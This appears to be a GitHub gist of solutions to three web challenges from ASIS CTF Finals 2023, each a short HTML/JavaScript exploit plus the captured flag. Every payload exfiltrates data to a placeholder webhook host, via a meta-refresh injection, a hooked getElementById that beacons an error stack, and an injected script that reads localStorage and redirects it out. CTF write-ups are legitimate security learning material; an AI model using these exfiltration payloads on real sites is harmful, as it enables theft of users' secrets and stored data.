Skip to content

Instantly share code, notes, and snippets.

@arkark

arkark/README.md

Last active December 31, 2023 07:42
Show Gist options
  • Save arkark/5211049988c14af0e3450ff04acfc2a3 to your computer and use it in GitHub Desktop.
Save arkark/5211049988c14af0e3450ff04acfc2a3 to your computer and use it in GitHub Desktop.
Download ZIP
ASIS CTF Finals 2023
Raw
README.md

ASIS CTF Finals 2023

[web] gimme csp

  • 47 solves / 96 pts
<body>
<script>
const HOOK_URL = "https://webhook.site/xxx";

const main = async () => {
  const elm = document.createElement("iframe");
  elm.src =
    "https://gimmecsp.asisctf.com?letter=" +
    encodeURIComponent(
      `<meta http-equiv="Refresh" content="0; URL=${HOOK_URL}/?q=$gift$">`
    );
  elm.referrerPolicy = "no-referrer";
  document.body.appendChild(elm);
};
main();
</script>
</body>

Flag:

ASIS{1m-n07-r34dy-f0r-2024-y3t-dfadb}

[web] Pupptear

  • 11 solves / 271 pts

ref:

<body>
<script>
const HOOK_URL = "https://webhook.site/xxx";

let sent = false;
function hook() {
  if (sent) return;
  sent = true;

  const e = new Error();
  navigator.sendBeacon(HOOK_URL, e.stack);
}
document.getElementById = hook;
</script>
</body>

The error stack:

Error
    at HTMLDocument.hook [as getElementById] (https://...redacted.../index.js:44:13)
    at eval (eval at G (:3:1641), <anonymous>:4:22)
    at P.<anonymous> (pptr:evaluateHandle;WaitTask.rerun%20(%2FASIS%7Bd1d-y0u-m4k3-pupp733r-cry-4n-3rr0r-6u35f5%7D%2Fnode_modules%2Fpuppeteer-core%2Flib%2Fcjs%2Fpuppeteer%2Fcommon%2FWaitTask.js%3A80%3A54):4:36)
    at P.start (pptr:internal:3:3734)
    at pptr:evaluate;WaitTask.rerun%20(%2FASIS%7Bd1d-y0u-m4k3-pupp733r-cry-4n-3rr0r-6u35f5%7D%2Fnode_modules%2Fpuppeteer-core%2Flib%2Fcjs%2Fpuppeteer%2Fcommon%2FWaitTask.js%3A110%3A32):2:29

Flag:

ASIS{d1d-y0u-m4k3-pupp733r-cry-4n-3rr0r-6u35f5}

It was an unintended solution.

[web] Sayeha

  • 9 solves / 300 pts
<body>
<script>
const TARGET_BASE_URL = "http://web";
// const TARGET_BASE_URL = "http://localhost:8000";

const HOOK_URL = "https://webhook.site/xxx";

const elm = document.createElement("iframe");
elm.src = `${TARGET_BASE_URL}?p=${encodeURIComponent(`
  const w = open("${TARGET_BASE_URL}");
  const flag = w.localStorage.getItem("secret");
  location = "${HOOK_URL}?q=" + flag;
`)}`;
document.body.appendChild(elm);
</script>
</body>

Flag:

ASIS{ab2340b08c5e6f4b55c23429c547dc5212f98}

It was an unintended solution.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment